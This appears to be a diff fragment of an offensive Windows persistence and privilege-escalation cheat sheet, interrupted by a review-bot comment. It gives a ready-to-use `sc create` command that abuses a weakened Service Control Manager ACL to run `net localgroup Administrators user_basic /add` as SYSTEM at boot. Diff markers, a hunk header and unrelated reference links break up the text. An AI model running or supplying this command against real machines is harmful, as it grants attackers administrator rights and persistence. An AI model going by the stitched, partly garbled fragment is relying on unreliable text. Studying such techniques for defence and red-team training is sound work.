Abuse the weaken configuration to create a service that grants administrator privilege to a custom user `user_basic`.
|
||||
|
||||
```ps1
|
||||
sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgroup Administrators user_basic /add" start= auto
|
||||
```
|
||||
|
||||
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
|
||||
|
||||
|
||||
### Scheduled Tasks Elevated
|
||||
|
||||
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
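Review bot: the opening sentence says the technique lets a non-administrative user "have full SYSTEM permissions", but `sc.exe sdset scmanager D:(A;;KA;;;WD)` by itself only grants everyone full access to the Service Control Manager; the elevation comes from the later `sc create LPE ... net.exe localgroup Administrators user_basic /add`, which runs as LocalSystem on the next boot, so the intro should describe the two-step chain. In the explanation of the ACE, `KA` is the SDDL abbreviation for `KEY_ALL_ACCESS` (generic full access), not "Key Access". Two grammar fixes: "Abuse the weaken configuration" should read "weakened configuration", and "grant the user with elevated privilege" should read "grant the user elevated privileges". Since `sc.exe sdshow scmanager` is already shown, it is worth adding one line that the default descriptor returned there is the baseline defenders should compare against when hunting for this change.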
|
||||
|
@ -580,3 +621,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
|
|||
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
|
||||
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
|
||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
||||
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|